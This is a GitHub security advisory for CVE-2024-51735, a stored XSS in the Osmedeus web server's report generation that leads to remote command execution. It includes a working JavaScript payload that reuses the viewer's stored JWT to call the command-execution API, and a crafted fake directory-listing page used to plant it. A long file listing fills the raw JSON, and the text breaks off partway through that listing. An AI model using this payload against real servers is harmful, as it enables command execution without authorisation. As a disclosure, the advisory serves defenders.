github - ghsa-wvv7-wm5v-w2gv

ghsa-wvv7-wm5v-w2gv

Vulnerability from github

Published
2024-11-05 15:18
Modified
2024-11-06 19:55
Severity ?
9.3 (Critical) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N
Summary
Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE
Details
Summary

XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details

When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md template.
```
Execute Summary Generated by Osmedeus {{Version}} at {{CurrentDay}}
Scan Information

🚀 Subdomains

🌐 HTTP Fingerprint

🐞 Vulnerability

List of Vulnerability Reports

Jaeles Scan

Nuclei Scan

🕷️ Spider Content

📃 Content Discovery

🔍 Port Scan

```
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS The issue starts with processing the tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on tags ⇒ We can create custom payloads by leveraging this mechanism." ``` <! -- Fake Index Content -->
Directory listing for /
``` * Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit * Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC

https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload ```
Directory listing for /
```
Impact

Execute command on server
Show details on source website
JSON
To clipboard
{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/j3ssie/osmedeus"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "4.6.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-51735"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-05T15:18:05Z",
    "nvd_published_at": "2024-11-05T19:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nXSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.\n\n### Details\nWhen using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.\n\n```\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://www.osmedeus.org\"\u003e\u003cimg alt=\"Osmedeus\" src=\"https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png\" height=\"140\" /\u003e\u003c/a\u003e\n  \u003cbr /\u003e\n  \u003cbr /\u003e\n  \u003cstrong\u003eExecute Summary Generated by Osmedeus {{Version}} at \u003cem\u003e{{CurrentDay}}\u003c/em\u003e\u003c/strong\u003e\n\n  \u003cp align=\"center\"\u003e\n  \u003ca href=\"https://docs.osmedeus.org/\"\u003e\u003cimg src=\"https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge\u0026logo=GitBook\u0026logoColor=39ff14\u0026labelColor=black\u0026color=black\"\u003e\u003c/a\u003e\n  \u003ca href=\"https://docs.osmedeus.org/donation/\"\u003e\u003cimg src=\"https://img.shields.io/badge/Donation-0078D4?style=for-the-badge\u0026logo=GitHub-Sponsors\u0026logoColor=39ff14\u0026labelColor=black\u0026color=black\"\u003e\u003c/a\u003e\n  \u003ca href=\"https://twitter.com/OsmedeusEngine\"\u003e\u003cimg src=\"https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge\u0026logo=Twitter\u0026logoColor=39ff14\u0026labelColor=black\u0026color=black\"\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/p\u003e\n\n## Scan Information \n\n\u003cscanInfo /\u003e\n\n***\n\n## \ud83d\ude80 Subdomains\n\n\u003ccontent src=\"{{Output}}/subdomain/final-{{Workspace}}.txt\" shorten=true /\u003e\n\n***\n\n## \ud83c\udf10 HTTP Fingerprint\n\n\u003ccontent src=\"{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt\" /\u003e\n\n***\n\n## \ud83d\udc1e Vulnerability\n\n### List of Vulnerability Reports\n\n- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)\n- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)\n- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)\n\n### Jaeles Scan\n\n\u003ccontent src=\"{{Output}}/vuln/active/jaeles-summary.txt\" /\u003e\n\n\u003ccontent src=\"{{Output}}/vuln/sensitive/jaeles-summary.txt\" /\u003e\n\n***\n\n### Nuclei Scan\n\n\u003ccontent src=\"{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt\" /\u003e\n\n***\n\n## \ud83d\udd77\ufe0f Spider Content\n\n\u003ccontent src=\"{{Output}}/linkfinding/links-{{Workspace}}.txt\"/\u003e\n\n***\n\n## \ud83d\udcc3 Content Discovery\n\n\u003ccontent src=\"{{Output}}/directory/unique-beautify-{{Workspace}}.txt\" /\u003e\n\n***\n\n\n## \ud83d\udd0d Port Scan\n\n\u003ccontent src=\"{{Output}}/portscan/open-ports.txt\" /\u003e\n\n\n***\n```\n\nThe contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS\nThe issue starts with processing the \u003ccontent\u003e tags, and XSS occurs when the extendTag function is called.\n\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114\nhttps://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124\n\nThe condition to enter this if branch must meet one of the following cases:\n\n* Tag shorten=true: In the default template, only subdomains have this tag \u21d2 Subdomains cannot contain special characters, so XSS is not possible.\n* len(fileContent) \u003e r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).\n\nAfter reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:\n\n* It can contain special characters since the spider retrieves results through Katana \u21d2 Katana parses content based on \u003ca\u003e tags \u21d2 We can create custom payloads by leveraging this mechanism.\"\n```\n \u003c! -- Fake Index Content --\u003e \n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\n\u003ctitle\u003eDirectory listing for /\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003eDirectory listing for /\u003c/h1\u003e\n\u003chr\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"1\"\u003e1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"?abc=\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003eyxfzssjq_1721182234998.pdf\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n* Easily bypass the condition len(fileContent) \u003e r.Opt.MDCodeBlockLimit\n* Spider is a module within the general workflow \u21d2 a default workflow that is most commonly used\n\n### PoC\n\nhttps://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing\n\nPayload RCE\n\n`\u003cscript\u003efetch(window.location.origin+\u0027/api/osmp/execute\u0027,{method:\u0027POST\u0027,body:JSON.stringify({command:\u0027echo 1 \u003e/tmp/js.txt\u0027,password:\u0027\u0027}),headers:{Authorization:\u0027Osmedeus \u0027+localStorage.jwt,\u0027Content-Type\u0027:\u0027application/json\u0027}});\u003c/script\u003e`\n\nFile index payload\n```\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"\u003e\n\u003chtml\u003e\n\u003chead\u003e\n\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"\u003e\n\u003ctitle\u003eDirectory listing for /\u003c/title\u003e\n\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003eDirectory listing for /\u003c/h1\u003e\n\u003chr\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"1\"\u003e1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"675559605-1278d133b090b74129f65f6d108d2c83.pdf\"\u003e675559605-1278d133b090b74129f65f6d108d2c83.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe\"\u003e959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"%5BMS-DOCX%5D-240416.docx\"\u003e[MS-DOCX]-240416.docx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"AnyDesk.exe\"\u003eAnyDesk.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Attachment.zip\"\u003eAttachment.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"barker.tar\"\u003ebarker.tar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"c1awptpm_1721182413858.pdf\"\u003ec1awptpm_1721182413858.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"cacert.der\"\u003ecacert.der\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"caido-desktop-logs-1729480323.zip\"\u003ecaido-desktop-logs-1729480323.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"caido-desktop-v0.41.0-win-x86_64.exe\"\u003ecaido-desktop-v0.41.0-win-x86_64.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"caido-desktop-v0.42.0-win-x86_64.exe\"\u003ecaido-desktop-v0.42.0-win-x86_64.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"cdd\"\u003ecdd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"CentOS-7-live-GNOME-x86_64.iso\"\u003eCentOS-7-live-GNOME-x86_64.iso\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"chrome-integrate.zip\"\u003echrome-integrate.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ChromeSetup.exe\"\u003eChromeSetup.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf\"\u003eCode_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"CxSAST.950.Release.Setup_9.5.0.100.7z\"\u003eCxSAST.950.Release.Setup_9.5.0.100.7z\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf\"\u003eC\u00c1C QUY \u0110\u1ecaNH \u0026amp; TI\u00caU CHU\u1ea8N C\u1ea6N BI\u1ebeT CHO DOANH NGHI\u1ec6P NH\u1ef0A XU\u1ea4T KH\u1ea8U V\u00c0O EU.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Danh%20sach%20may%20chu%20T18.xlsx\"\u003eDanh sach may chu T18.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"de4dot-net45.zip\"\u003ede4dot-net45.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"de4dot-netcoreapp3.1.zip\"\u003ede4dot-netcoreapp3.1.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"desktop.ini\"\u003edesktop.ini\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"disk-1.KkwpoIcO.vmdk.part\"\u003edisk-1.KkwpoIcO.vmdk.part\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"disk-1.vmdk\"\u003edisk-1.vmdk\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"dist.zip\"\u003edist.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"dnSpy-net-win64.zip\"\u003ednSpy-net-win64.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"doc.9.1.0.rar\"\u003edoc.9.1.0.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"download\"\u003edownload\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Earned_Achievements_2024-09-16.pdf\"\u003eEarned_Achievements_2024-09-16.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Eazfuscator.NET%202024.1%20Setup.msi\"\u003eEazfuscator.NET 2024.1 Setup.msi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"flare-ida-master.zip\"\u003eflare-ida-master.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"gitlab-recovery-codes.txt\"\u003egitlab-recovery-codes.txt\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Hacking%20Rust.pdf\"\u003eHacking Rust.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Huong%20dan%20cai%20dat%20Oracle%20New.docx\"\u003eHuong dan cai dat Oracle New.docx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ida83_sdk_tools_v2.zip\"\u003eida83_sdk_tools_v2.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ida84_sdk_tools.zip\"\u003eida84_sdk_tools.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"IDARustDemangler.py\"\u003eIDARustDemangler.py\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"idb2pat.py\"\u003eidb2pat.py\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"incident-notification_26.03.2024-2.pdf\"\u003eincident-notification_26.03.2024-2.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"ironword.2024.8.3.nupkg\"\u003eironword.2024.8.3.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"KCSC_Recruitment.pdf\"\u003eKCSC_Recruitment.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx\"\u003eK\u1ebf ho\u1ea1ch \u0111\u00e0o t\u1ea1o 05102023 (2).xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"linkfinder.json\"\u003elinkfinder.json\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Margherita%20Report%20Demo_report.pdf\"\u003eMargherita Report Demo_report.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Mastering_Malware_Analysis.pdf\"\u003eMastering_Malware_Analysis.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx\"\u003eM\u1eabu-Danh sach Quan ly Backup-CS_v1.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"node-v20.17.0-x64.msi\"\u003enode-v20.17.0-x64.msi\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip\"\u003eOpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf\"\u003eOSED Notes Study Overview by Joas Antonio.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"PAKD%20paytech.xlsx\"\u003ePAKD paytech.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"password\"\u003epassword\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"patriotctf.rar\"\u003epatriotctf.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"pestudio-9.59.zip\"\u003epestudio-9.59.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2023-01-04_09-04-52.jpg\"\u003ephoto_2023-01-04_09-04-52.jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2023-01-04_09-04-55%20%282%29.jpg\"\u003ephoto_2023-01-04_09-04-55 (2).jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2023-01-04_09-04-55.jpg\"\u003ephoto_2023-01-04_09-04-55.jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"photo_2024-09-27_09-47-55.jpg\"\u003ephoto_2024-09-27_09-47-55.jpg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx\"\u003ePh\u1ee5 l\u1ee5c 5.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"plugin.zip\"\u003eplugin.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"processhacker-2.39-setup.exe\"\u003eprocesshacker-2.39-setup.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"publications.pdf\"\u003epublications.pdf\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"pwnfox.json\"\u003epwnfox.json\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"pykd_ext_2.0.0.25.zip\"\u003epykd_ext_2.0.0.25.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"rp-win.zip\"\u003erp-win.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"rs.zip\"\u003ers.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"rustup-init.exe\"\u003erustup-init.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"setup.exe\"\u003esetup.exe\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Single%20Page%20Applications%20with%20Vue.js.rar\"\u003eSingle Page Applications with Vue.js.rar\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Skilled_Person_Registration_Template_2pWPpnl.xlsx\"\u003eSkilled_Person_Registration_Template_2pWPpnl.xlsx\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"snapshot_2024-10-03_12-14.zip\"\u003esnapshot_2024-10-03_12-14.zip\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"spire.doc.12.7.3.nupkg\"\u003espire.doc.12.7.3.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"spire.doc.9.1.0.nupkg\"\u003espire.doc.9.1.0.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"spire.doc.cpp.11.4.5.nupkg\"\u003espire.doc.cpp.11.4.5.nupkg\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"sticker.webm\"\u003esticker.webm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"Telegram%20Desktop/\"\u003eTelegram Desktop/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test\"\u003etest\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test.php\"\u003etest.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test2\"\u003etest2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test1.php\"\u003etest1.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test2.php\"\u003etest2.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test3.php\"\u003etest3.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test4.php\"\u003etest4.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test5.php\"\u003etest5.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test6.php\"\u003etest6.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test7.php\"\u003etest7.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test8.php\"\u003etest8.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test9.php\"\u003etest9.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test10.php\"\u003etest10.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test11.php\"\u003etest11.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test12.php\"\u003etest12.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test13.php\"\u003etest13.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test14.php\"\u003etest14.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test15.php\"\u003etest15.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test16.php\"\u003etest16.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test17.php\"\u003etest17.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test18.php\"\u003etest18.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test19.php\"\u003etest19.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test20.php\"\u003etest20.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test21.php\"\u003etest21.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test22.php\"\u003etest22.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test23.php\"\u003etest23.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test24.php\"\u003etest24.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test25.php\"\u003etest25.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test26.php\"\u003etest26.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test27.php\"\u003etest27.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test28.php\"\u003etest28.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test29.php\"\u003etest29.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test30.php\"\u003etest30.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test31.php\"\u003etest31.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test32.php\"\u003etest32.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test33.php\"\u003etest33.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test34.php\"\u003etest34.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test35.php\"\u003etest35.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test36.php\"\u003etest36.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test37.php\"\u003etest37.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test38.php\"\u003etest38.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test39.php\"\u003etest39.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test40.php\"\u003etest40.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test41.php\"\u003etest41.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test42.php\"\u003etest42.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test43.php\"\u003etest43.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test44.php\"\u003etest44.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test45.php\"\u003etest45.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test46.php\"\u003etest46.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test47.php\"\u003etest47.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test48.php\"\u003etest48.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test49.php\"\u003etest49.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test50.php\"\u003etest50.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test51.php\"\u003etest51.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test52.php\"\u003etest52.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test53.php\"\u003etest53.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test54.php\"\u003etest54.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test55.php\"\u003etest55.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test56.php\"\u003etest56.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test57.php\"\u003etest57.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test58.php\"\u003etest58.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test59.php\"\u003etest59.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test60.php\"\u003etest60.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test61.php\"\u003etest61.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test62.php\"\u003etest62.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test63.php\"\u003etest63.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test64.php\"\u003etest64.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test65.php\"\u003etest65.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test66.php\"\u003etest66.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test67.php\"\u003etest67.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test68.php\"\u003etest68.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test69.php\"\u003etest69.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test70.php\"\u003etest70.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test71.php\"\u003etest71.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"test72.php\"\u003etest72.php\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca 